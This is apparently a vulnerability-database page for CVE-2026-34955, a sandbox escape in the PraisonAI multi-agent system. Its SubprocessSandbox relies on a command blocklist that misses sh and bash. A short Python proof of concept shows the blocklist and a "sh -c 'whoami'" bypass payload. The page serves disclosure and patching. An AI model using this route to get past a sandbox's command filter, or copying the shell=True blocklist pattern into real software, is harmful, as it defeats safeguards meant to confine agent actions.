CVE-2026-34955

Description

PraisonAI is a multi-agent teams system. Prior to version 4.5.97, SubprocessSandbox in all modes (BASIC, STRICT, NETWORK_ISOLATED) calls subprocess.run() with shell=True and relies solely on string-pattern matching to block dangerous commands. The blocklist does not include sh or bash as standalone executables, allowing trivial sandbox escape in STRICT mode via sh -c '<command>'. This issue has been patched in version 4.5.97.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE

PraisonAI < 4.5.97

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import subprocess

# Simulation of the vulnerable SubprocessSandbox logic
def vulnerable_sandbox(command):
    # The blocklist in the actual product misses 'sh' and 'bash'
    blocklist = ['rm', 'cat', 'whoami'] 
    
    for blocked in blocklist:
        if blocked in command:
            print(f"Blocked command detected: {blocked}")
            return

    print(f"Executing: {command}")
    # The vulnerability: using shell=True allows shell interpreters
    subprocess.run(command, shell=True)

# PoC: Bypassing the sandbox using 'sh -c'
# 'whoami' is in the blocklist, but 'sh -c' is not.
payload = "sh -c 'whoami'"
vulnerable_sandbox(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34955
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34955
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34955/
[4] VulDB https://vuldb.com/cve/CVE-2026-34955
[5] https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-r4f2-3m54-pp7q

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34955", "sourceIdentifier": "[email protected]", "published": "2026-04-04T00:16:19.370", "lastModified": "2026-04-14T18:56:02.767", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to version 4.5.97, SubprocessSandbox in all modes (BASIC, STRICT, NETWORK_ISOLATED) calls subprocess.run() with shell=True and relies solely on string-pattern matching to block dangerous commands. The blocklist does not include sh or bash as standalone executables, allowing trivial sandbox escape in STRICT mode via sh -c '<command>'. This issue has been patched in version 4.5.97."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.97", "matchCriteriaId": "7525B4ED-CECC-4805-8EED-C055561A15F0"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-r4f2-3m54-pp7q", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}